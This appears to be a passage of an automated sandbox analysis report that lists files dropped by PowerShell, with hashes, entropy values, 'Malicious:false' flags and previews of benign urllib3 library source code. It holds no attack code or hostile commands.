                                                                                                                                                                                                              Preview:let Status = {. SUCCESS_HEADER: -1,. SUCCESS_EOF: -2,. ERROR_TIMEOUT: -3,. ERROR_EXCEPTION: -4,.};..let connections = {};.let nextConnectionID = 1;.const encoder = new TextEncoder();..self.addEventListener("message", async function (event) {. if (event.data.close) {. let connectionID = event.data.close;. delete connections[connectionID];. return;. } else if (event.data.getMore) {. let connectionID = event.data.getMore;. let { curOffset, value, reader, intBuffer, byteBuffer } =. connections[connectionID];. // if we still have some in buffer, then just send it back straight away. if (!value || curOffset >= value.length) {. // read another buffer if required. try {. let readResponse = await reader.read();.. if (readResponse.done) {. // read everything - clear connection and return. delete connections[connectionID];. Atomics.store(intBuffer, 0, Status.SUCCESS_EOF);. Atomics.notify(intBuffer, 0);.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14131
                                                                                                                                                                                                              Entropy (8bit):4.581820013726768
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:fao+GnxIT+rEm4IVNSCxmhFFsOeA+Df1AlkhIc3SoO:fF+oZMImCOEfDhIuS3
                                                                                                                                                                                                              MD5:1259D5B9753B0A80D00F91D57731D60E
                                                                                                                                                                                                              SHA1:92664A84EBE36BF4E845BA734D76B70506E66A25
                                                                                                                                                                                                              SHA-256:CA6C09947041BB0E964E92A03C7A5D9A6ACD07196CAFBE47AA80F8467DBB6179
                                                                                                                                                                                                              SHA-512:32A7179723C4D90AEC36FBECBC56A607890FF42C864E965529A5FF136BC9E325CF42B62E9FD9EB9CB82FC8875B07B179C12CC950777E93C6F8AA36A52AB776FB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:""".Support for streaming http requests in emscripten...A few caveats -..Firstly, you can't do streaming http in the main UI thread, because atomics.wait isn't allowed..Streaming only works if you're running pyodide in a web worker...Secondly, this uses an extra web worker and SharedArrayBuffer to do the asynchronous fetch.operation, so it requires that you have crossOriginIsolation enabled, by serving over https.(or from localhost) with the two headers below set:.. Cross-Origin-Opener-Policy: same-origin. Cross-Origin-Embedder-Policy: require-corp..You can tell if cross origin isolation is successfully enabled by looking at the global crossOriginIsolated variable in.javascript console. If it isn't, streaming requests will fallback to XMLHttpRequest, i.e. getting the whole.request into a buffer and then returning it. it shows a warning in the javascript console in this case...Finally, the webworker which does the streaming fetch is created on initial import, but will only be star
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):566
                                                                                                                                                                                                              Entropy (8bit):4.6695794858845625
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1Rjd6xkB2laJtp7Hz+6ZfM+9B2Nx4ehQCn7e7q9NNMdke:1RXBP+6ZfM+9QQw5xMqe
                                                                                                                                                                                                              MD5:56AAE3C754DE48411A8E711AE387D95F
                                                                                                                                                                                                              SHA1:59F1A59F8AC5104E0552CBD253311E47B5A5FB9E
                                                                                                                                                                                                              SHA-256:98BDBCB33CB52AF137349856A2BE633666ABA7C830A650D4FBB8301996398344
                                                                                                                                                                                                              SHA-512:5C65B5F475B5899609B7F99610C1672A0B8538481AD74436DE4078DC1E94D7E39CFDBE045C15C16C1B21B3959E89245C58D3A6DE52BDDA7961EE315EB6D5BA83
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..from dataclasses import dataclass, field..from ..._base_connection import _TYPE_BODY...@dataclass.class EmscriptenRequest:. method: str. url: str. params: dict[str, str] | None = None. body: _TYPE_BODY | None = None. headers: dict[str, str] = field(default_factory=dict). timeout: float = 0. decode_content: bool = True.. def set_header(self, name: str, value: str) -> None:. self.headers[name.capitalize()] = value.. def set_body(self, body: _TYPE_BODY | None) -> None:. self.body = body.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9546
                                                                                                                                                                                                              Entropy (8bit):4.181441869515195
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:6cnNlu+w09j0qLthGyvUEaIg+N0abUlZ0ylZBA2brTQxcyf1TF4BK:6cnCTqLts6BNXYTQGq1TFz
                                                                                                                                                                                                              MD5:CF6B54A10F093B22027602EB99BAE219
                                                                                                                                                                                                              SHA1:11017F834759D519B240179E35CC1046D218503E
                                                                                                                                                                                                              SHA-256:C080E6749E1DA055AA2E5E6CF3A97D9F457BD201634361D668F833EBD8CCE761
                                                                                                                                                                                                              SHA-512:5D3EE7E4F9507867778B15EC3DCAEB54B482840973DE24A99892E8E6214065E8436C80AE079AB9DD4E0013BCAB51B2077BA1C922D4B2C53C54CEA6CB2986C56A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import json as _json.import logging.import typing.from contextlib import contextmanager.from dataclasses import dataclass.from http.client import HTTPException as HTTPException.from io import BytesIO, IOBase..from ...exceptions import InvalidHeader, TimeoutError.from ...response import BaseHTTPResponse.from ...util.retry import Retry.from .request import EmscriptenRequest..if typing.TYPE_CHECKING:. from ..._base_connection import BaseHTTPConnection, BaseHTTPSConnection..log = logging.getLogger(__name__)...@dataclass.class EmscriptenResponse:. status_code: int. headers: dict[str, str]. body: IOBase | bytes. request: EmscriptenRequest...class EmscriptenHttpResponseWrapper(BaseHTTPResponse):. def __init__(. self,. internal_response: EmscriptenResponse,. url: str | None = None,. connection: BaseHTTPConnection | BaseHTTPSConnection | None = None,. ):. self._pool = None # set by pool class. se
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19161
                                                                                                                                                                                                              Entropy (8bit):4.848112136379195
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:WwnnmU84aF2O8YwCv0KZ78tuqhGWDUGI0iwZzaawE0wD4brf3Jz3OIY/JB4/A864:W0nLQBwCvPhGzhGUiwdfDYFYuI6
                                                                                                                                                                                                              MD5:F4CD48C5C1B3DA333E5727A85AFAC0F2
                                                                                                                                                                                                              SHA1:52C5FA2F597F05883B2548EAEC5C2CD8FE6E8AE0
                                                                                                                                                                                                              SHA-256:5F7D5E0981B0074F449001D7F11843282D17D0A8BB774702556A0C25950CE5B4
                                                                                                                                                                                                              SHA-512:ACF0752CFEE4E1E77A706D453BADC02AF8F3B4C6018B1F24AEDDA913E9E385FD3F362AB27C0332B6FF3D9E431B0FB25FB380C5E2E73ABE8DA1005E7D3EAD5D7A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:""".Module for using pyOpenSSL as a TLS backend. This module was relevant before.the standard library ``ssl`` module supported SNI, but now that we've dropped.support for Python 2.7 all relevant Python versions support SNI so.**this module is no longer recommended**...This needs the following packages installed:..* `pyOpenSSL`_ (tested with 16.0.0).* `cryptography`_ (minimum 1.3.4, from pyopenssl).* `idna`_ (minimum 2.0)..However, pyOpenSSL depends on cryptography, so while we use all three directly here we.end up having relatively few packages required...You can install them with the following command:.... code-block:: bash.. $ python -m pip install pyopenssl cryptography idna..To activate certificate checking, call.:func:`~urllib3.contrib.pyopenssl.inject_into_urllib3` from your Python code.before you begin making HTTP requests. This can be done in a ``sitecustomize``.module, or at any other time before your application begins using ``urllib3``,.like this:.... code-block:: python.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7572
                                                                                                                                                                                                              Entropy (8bit):4.640908846878181
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:AojUEqLPKpdNZN7KOSwZf0wvMrpV611hMEZVgJ9:AVEqmrB7KOJZf0wvQpk11KE7M9
                                                                                                                                                                                                              MD5:A752ADBA7D2349D97C7C7ED35816E4ED
                                                                                                                                                                                                              SHA1:6E3FEEB779D3540682C0A9D39233D067DD8B952C
                                                                                                                                                                                                              SHA-256:8054B6FB33B0E3FBCB1A952F13139FDDF3554FC962CFABE1336B7A9413E7DC26
                                                                                                                                                                                                              SHA-512:E2DE4AA3EA8E365D938C6AC9469B588E145B853C3AECDF91C5C0A7CD2AEB6E5FE59A2042C1A46FA462F3DCE40427DB001E9C6100CEB3D56464C4A03C72091F26
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:""".This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recommended to use ``socks5h://`` or ``socks4a://`` schemes in. your ``proxy_url`` to ensure that DNS resolution is done from the remote. server instead of client-side when connecting to a domain name...SOCKS4 supports IPv4 and domain names with the SOCKS4A extension. SOCKS5.supports IPv4, IPv6, and domain names...When connecting to a SOCKS4 proxy the ``usern
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9393
                                                                                                                                                                                                              Entropy (8bit):4.792397513804208
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/yFB1ICxHTkuUw7qRlqHN4cVSPC5fjY/axAIH9s3w6pov+1xBXVm65BPHQcc19U6:/CTXrWZcmC9XH9spoCFm65BPHQcrO95
                                                                                                                                                                                                              MD5:4F61F9FFB40020611E33E90E9F64752E
                                                                                                                                                                                                              SHA1:6866D84C5CBF24BE572B91D694A83EA69F14551B
                                                                                                                                                                                                              SHA-256:4436A2B9DB51EEBA9B54A4CAA4B4A064106DC1A22A57B799B5EAEF655FE665A8
                                                                                                                                                                                                              SHA-512:C0E625642E608878831E3D104A011C7EA1913A0B78D6BA9A9BC0CC92B94D34C7185A71F0D5B134958A0A78BD14ED7FC2ABE14DFEB3057CA2AB1936226562CF44
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import socket.import typing.import warnings.from email.errors import MessageDefect.from http.client import IncompleteRead as httplib_IncompleteRead..if typing.TYPE_CHECKING:. from .connection import HTTPConnection. from .connectionpool import ConnectionPool. from .response import HTTPResponse. from .util.retry import Retry..# Base Exceptions...class HTTPError(Exception):. """Base exception used by this module."""...class HTTPWarning(Warning):. """Base warning used by this module."""..._TYPE_REDUCE_RESULT = typing.Tuple[. typing.Callable[..., object], typing.Tuple[object, ...].]...class PoolError(HTTPError):. """Base exception for errors caused within a pool.""".. def __init__(self, pool: ConnectionPool, message: str) -> None:. self.pool = pool. super().__init__(f"{pool}: {message}").. def __reduce__(self) -> _TYPE_REDUCE_RESULT:. # For pickling purposes.. return self.__class__, (None, None)...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10843
                                                                                                                                                                                                              Entropy (8bit):4.6192856607563595
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:WSerkc/Ank8CQqdfkl92KcOpIshgcRG/A47FAK/:WSerkSATIDOpIsh747FAK/
                                                                                                                                                                                                              MD5:2BD54B482695939797D7AFE1FF47707A
                                                                                                                                                                                                              SHA1:8778216DE2496C87F13E4B426B43B932C7B9CBC1
                                                                                                                                                                                                              SHA-256:F2F8B43DE468FE91397213E6240D3B2D9B4C91596CE14AC14B5936C4CE74EA33
                                                                                                                                                                                                              SHA-512:A5DAFC869C39C369AE2EBE88931DEABBD68F2A4CEC8BC09C99753AF75A713CA1B96E8989B3AD38E754EB548C1D6829A6F0AFC50368AC7C91A6AE430E5DEE7EFE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import email.utils.import mimetypes.import typing.._TYPE_FIELD_VALUE = typing.Union[str, bytes]._TYPE_FIELD_VALUE_TUPLE = typing.Union[. _TYPE_FIELD_VALUE,. typing.Tuple[str, _TYPE_FIELD_VALUE],. typing.Tuple[str, _TYPE_FIELD_VALUE, str],.]...def guess_content_type(. filename: str | None, default: str = "application/octet-stream".) -> str:. """. Guess the "Content-Type" of a file... :param filename:. The filename to guess the "Content-Type" of using :mod:`mimetypes`.. :param default:. If no "Content-Type" can be guessed, default to `default`.. """. if filename:. return mimetypes.guess_type(filename)[0] or default. return default...def format_header_param_rfc2231(name: str, value: _TYPE_FIELD_VALUE) -> str:. """. Helper function to format and quote a single header parameter using the. strategy defined in RFC 2231... Particularly useful for header parameters which might contain. non-A
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2395
                                                                                                                                                                                                              Entropy (8bit):4.946770037622349
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:PV0Gy/fOGJ7Ae16YNKAqj2GSgg5/zjggoW:TyHOGNAeE2DmgoW
                                                                                                                                                                                                              MD5:ED5B7522289EBB739A3E3800CCF533C0
                                                                                                                                                                                                              SHA1:E80BE57EC82444ECD1E52FB96A132998AFAFC79A
                                                                                                                                                                                                              SHA-256:FBDA894F5D5C3468CEF5DAA7236D3EA04AD9B93BCD68CD7CC5964F0A36526CE1
                                                                                                                                                                                                              SHA-512:34886FD378BE78B2301C5FC325DECAE9E8A269DF49DBE127604A41379F8BF01E0ED17AB2E47EDCDFCC5E4DE287D2C94B20D6051AA599B1A6BA7B5D60783DE1D0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import binascii.import codecs.import os.import typing.from io import BytesIO..from .fields import _TYPE_FIELD_VALUE_TUPLE, RequestField..writer = codecs.lookup("utf-8")[3].._TYPE_FIELDS_SEQUENCE = typing.Sequence[. typing.Union[typing.Tuple[str, _TYPE_FIELD_VALUE_TUPLE], RequestField].]._TYPE_FIELDS = typing.Union[. _TYPE_FIELDS_SEQUENCE,. typing.Mapping[str, _TYPE_FIELD_VALUE_TUPLE],.]...def choose_boundary() -> str:. """. Our embarrassingly-simple replacement for mimetools.choose_boundary.. """. return binascii.hexlify(os.urandom(16)).decode()...def iter_field_objects(fields: _TYPE_FIELDS) -> typing.Iterable[RequestField]:. """. Iterate over fields... Supports list of (k, v) tuples and dicts, and lists of. :class:`~urllib3.fields.RequestField`... """. iterable: typing.Iterable[RequestField | tuple[str, _TYPE_FIELD_VALUE_TUPLE]].. if isinstance(fields, typing.Mapping):. iterable = fields.items(). e
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7480
                                                                                                                                                                                                              Entropy (8bit):4.382351231276667
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:/Ehh2nkc7vutaT7peGpTl44XHAp9ZzP/lyp:/Ehh2nkhtApZ+zP/lyp
                                                                                                                                                                                                              MD5:528B9B14B39B16DA6B16CFD4C217BBD1
                                                                                                                                                                                                              SHA1:C65205157172B424791CF2426EDC813F10B0000D
                                                                                                                                                                                                              SHA-256:E1041C8D333D51839065ED2BF0A9C0F1A9D4F524F8A7FB37481DE0453B9EC8F7
                                                                                                                                                                                                              SHA-512:9345E2DCD23D518E34C450D71C1CF42374CB54F3734C18CD585A208F2851FDF5935516426154AF3318F14CAD0451724843733418B010EFEA12B3CD585BDF1454
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import threading.import types.import typing..import h2.config # type: ignore[import-untyped].import h2.connection # type: ignore[import-untyped].import h2.events # type: ignore[import-untyped]..import urllib3.connection.import urllib3.util.ssl_.from urllib3.response import BaseHTTPResponse..from ._collections import HTTPHeaderDict.from .connection import HTTPSConnection.from .connectionpool import HTTPSConnectionPool..orig_HTTPSConnection = HTTPSConnection..T = typing.TypeVar("T")...class _LockedObject(typing.Generic[T]):. """. A wrapper class that hides a specific object behind a lock... The goal here is to provide a simple way to protect access to an object. that cannot safely be simultaneously accessed from multiple threads. The. intended use of this class is simple: take hold of it with a context. manager, which returns the protected object.. """.. def __init__(self, obj: T):. self.lock = threading.RLock().
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22935
                                                                                                                                                                                                              Entropy (8bit):4.614283888882988
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:DuIk4vjqADeACc61gSm/mTTG7vlT9xp4A2kkW1:aITqADeAClSSUSkt9xp32kke
                                                                                                                                                                                                              MD5:932B54F4FDF5CB9C5BBAFA13519E135A
                                                                                                                                                                                                              SHA1:FFC71602ED5A947C038BB3C4E70212221E1C3F5B
                                                                                                                                                                                                              SHA-256:7DC0B73B08C52B185AD3A36C38E4706D93B3AD5B75A7263E6CD09B2A2A82D25F
                                                                                                                                                                                                              SHA-512:3F1E5B5D8BA3B134889977E6F679B8C3B369473E4C6B15A256F3EB5C2F84C65A77093B20BDF09A65E25465BD97C27633397F8EE0D60796604D945741F4E78FAC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import functools.import logging.import typing.import warnings.from types import TracebackType.from urllib.parse import urljoin..from ._collections import HTTPHeaderDict, RecentlyUsedContainer.from ._request_methods import RequestMethods.from .connection import ProxyConfig.from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool, port_by_scheme.from .exceptions import (. LocationValueError,. MaxRetryError,. ProxySchemeUnknown,. URLSchemeUnknown,.).from .response import BaseHTTPResponse.from .util.connection import _TYPE_SOCKET_OPTIONS.from .util.proxy import connection_requires_http_tunnel.from .util.retry import Retry.from .util.timeout import Timeout.from .util.url import Url, parse_url..if typing.TYPE_CHECKING:. import ssl. from typing import Literal..__all__ = ["PoolManager", "ProxyManager", "proxy_from_url"]...log = logging.getLogger(__name__)..SSL_KEYWORDS = (. "key_file",. "cert_file",. "cert_reqs",. "ca
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):93
                                                                                                                                                                                                              Entropy (8bit):4.327987613540449
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:SqWjty91M9bI+XREqyxReDGrvFlPJc:SjhyDS8mRBkrrJc
                                                                                                                                                                                                              MD5:8FB95F1F445D0278380B68C69E7C98D3
                                                                                                                                                                                                              SHA1:EF60F75D9814C879E0D3E690DBEC69BDC264B132
                                                                                                                                                                                                              SHA-256:51A0AE3C56B71FC5006A46EDFB91BC48F69C95D4CE1AF26FD7CA4F8D42798036
                                                                                                                                                                                                              SHA-512:A3ED53FA711BD4F871B3D800C235F63A8510B6F5DBF849987DAA2F92A7F20F09DEA1E055504FC5956BB48E735323A31CBE06E4E0262FBEC0D3A61C5809EDA7E3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Instruct type checkers to look for inline type annotations in this package..# See PEP 561..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):43874
                                                                                                                                                                                                              Entropy (8bit):4.333854457881415
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:VCm8zwGlCDeXTQT2YpJr/YVMMs6u4r07Jo6Zv+1nP1dkzK63z9Q3ONzP70vtJ:VCmswGjXETZpMs6PM6JaTIb
                                                                                                                                                                                                              MD5:E1A23A204559F320EA45295D58458FE3
                                                                                                                                                                                                              SHA1:43321D36D61BA8C6A4676459A6BE8D5164EC755F
                                                                                                                                                                                                              SHA-256:966BEC793A106E42D7B85C80DE3712C823E34E049F6BA60F038C54855AAAF102
                                                                                                                                                                                                              SHA-512:87A9E5CC91EF024CC7FD42CE362E8E22A96B10C0020DF51AC437AC0EADAD6C6A65DAF6D57C00AC56DE8E162DBA038EAFF07F5BCABF28EC32C980FAA277680525
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import collections.import io.import json as _json.import logging.import re.import sys.import typing.import warnings.import zlib.from contextlib import contextmanager.from http.client import HTTPMessage as _HttplibHTTPMessage.from http.client import HTTPResponse as _HttplibHTTPResponse.from socket import timeout as SocketTimeout..if typing.TYPE_CHECKING:. from ._base_connection import BaseHTTPConnection..try:. try:. import brotlicffi as brotli # type: ignore[import-not-found]. except ImportError:. import brotli # type: ignore[import-not-found].except ImportError:. brotli = None..try:. import zstandard as zstd # type: ignore[import-not-found].. # The package 'zstandard' added the 'eof' property starting. # in v0.18.0 which we require to ensure a complete and. # valid zstd stream was fed into the ZstdDecoder.. # See: https://github.com/urllib3/urllib3/pull/2624. _zstd_version = _zstd_version = tuple(.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1001
                                                                                                                                                                                                              Entropy (8bit):4.809819899735385
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JfEVki9yG/Tfgy2xjGfQs/ukxvth12MrdZrB5c6Qi7QOtzJAAJxj:J8yiQGsXjG4s/ukdo4rB5c7ifR6sj
                                                                                                                                                                                                              MD5:C66C1C6F2BAE795547EFF79264441DD4
                                                                                                                                                                                                              SHA1:52460D96B307E3CB7DA56A187FC2C4E597DE3C87
                                                                                                                                                                                                              SHA-256:FAA792D1071E8AF6B3BC110A0CD142008FBA00271D0CE1384CCBE8ED22CD9404
                                                                                                                                                                                                              SHA-512:72FE5CD3872338EF1FA15D077006CED5EB8678A4F2DBD191A9AE8DAC2585E2E41C3EBE2506A8F8F8729E41577E62D21D2F5A1721D41CB9E187A208DFF79D8764
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# For backwards compatibility, provide imports that used to be here..from __future__ import annotations..from .connection import is_connection_dropped.from .request import SKIP_HEADER, SKIPPABLE_HEADERS, make_headers.from .response import is_fp_closed.from .retry import Retry.from .ssl_ import (. ALPN_PROTOCOLS,. IS_PYOPENSSL,. SSLContext,. assert_fingerprint,. create_urllib3_context,. resolve_cert_reqs,. resolve_ssl_version,. ssl_wrap_socket,.).from .timeout import Timeout.from .url import Url, parse_url.from .wait import wait_for_read, wait_for_write..__all__ = (. "IS_PYOPENSSL",. "SSLContext",. "ALPN_PROTOCOLS",. "Retry",. "Timeout",. "Url",. "assert_fingerprint",. "create_urllib3_context",. "is_connection_dropped",. "is_fp_closed",. "parse_url",. "make_headers",. "resolve_cert_reqs",. "resolve_ssl_version",. "ssl_wrap_socket",. "wait_for_read",. "wait_for_write",. "SKIP_HEADER",. "SKIPPABLE_HEADERS",.)
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4761
                                                                                                                                                                                                              Entropy (8bit):5.621799899481825
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:rxuoVi4Rg7cwwStdnd0Q/zGENHYk4rQv0cZBbNbs:Vrebj0QdN4nrQHbps
                                                                                                                                                                                                              MD5:BD8A99FAC0ECBF852A8EE5C11C435DAE
                                                                                                                                                                                                              SHA1:F7C451ED08D8654388FC3ABC6DA848BFEDD0E6DB
                                                                                                                                                                                                              SHA-256:C309CE2617ECDCAB7E33582B0C1C1CE6BFE1787E21BCF8FA44107CC604703D73
                                                                                                                                                                                                              SHA-512:9FD91E56A0AD62FDA567763F4FD07038A414FE93F010BD5FC261328427F1A64D9EBEA16FCFD813CE1329F74E168E7FD1F6D88CF2E89A57D5C30D510233E5747B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........Hl.en...............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j...................e.j...................e.e.e.j...................e.e.f.....f.........Z.e.j...................r.d.d.l.m.Z...d.d...Z.e.d.d.f...................d.d...Z.............d.d...Z.d.d...Z.d.d...Z...e.d.........Z.y.)......)...annotationsN.....)...LocationParseError.....)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...BaseHTTPConnectionc...........................|.j.....................S.).z.. Returns True if the connection is dropped and should be closed.. :param conn: :class:`urllib3.connection.HTTPConnection` object.. )...is_connected)...conns.... .kC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\urllib3/util/connection.py..is_connection_droppedr........s............. .. .. .. .....c.....................~.....|.\...}.}.|.j...................d.........r.|.j...................d.........}.d.}.t.................}...|.j...................d..........
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1230
                                                                                                                                                                                                              Entropy (8bit):5.530670635497269
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:xp6fbfIp6DXiIQXvAFnT8ade8uFM23wfhjbrn3vlOig56kZMQb:qWI38a48uFM2ujbzflM/ZDb
                                                                                                                                                                                                              MD5:EF5EF1C80962989E67A101EE606A1616
                                                                                                                                                                                                              SHA1:C7CDB66DE8D64C114B68EF955AD5AB5DAF47C88B
                                                                                                                                                                                                              SHA-256:F7A77174D74168A69EB9F8D3A1C751AA5340947C185C10A96021CBB49E7EBCD8
                                                                                                                                                                                                              SHA-512:4501D8C4A707E0FF0E6B040D239EFF55D97A8558645FCE1F01C4D04F3BA8A63AA8C77AA364AD1A7B9E4B63D1DFCD740F9B7C16FE4A8695A732E202AE1F4F3D71
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........Hl.e|.........................f.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...e.j...................r.d.d.l.m.Z.........d...............d.d...Z.y.)......)...annotationsN.....)...Url.....)...ProxyConfigc.....................R.....|...y.|.d.k(..r.y.|.j...................d.k(..r.|.r.|.j...................r.y.y.).a?.... Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). F..http..httpsT)...scheme..use_forwarding_for_https)...proxy_url..proxy_config..destination_schemes.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\urllib3/util/proxy.py..connection_requires_http_tunnelr........s>...... ...............V..#...............G..#........1..1.............).NNN).r....z.Url | Noner....z.ProxyConfig
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8049
                                                                                                                                                                                                              Entropy (8bit):5.820662767916139
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:YsbTDWh50/4ahpQ2P7f8KpDKvGQUyz/KuyMycr0/pbHMCtk0i8xKd8lcUD0ajPVU:Ys44P7lKvGRGQH5i8w8GU3Vnk7/x
                                                                                                                                                                                                              MD5:111C45966FBF0BD49A59536381B01FF3
                                                                                                                                                                                                              SHA1:2E8060FB1A72BAF46811A561119357D00C7C1E99
                                                                                                                                                                                                              SHA-256:CB56A7DA587D0BB807F79333D20CF5DFC4CC81C60D8692C167DC788904802F5F
                                                                                                                                                                                                              SHA-512:2AC5B9640CDD111C64666BA2E1FA5B0615DB6A349564726DDB0F1DDC086939FDF4C0F11A0366F59C343A88D991AB53D2DF4F2CAAD310D09A0360E8CD09C6983F
                                                                                                                                                                                                              Malicious:false
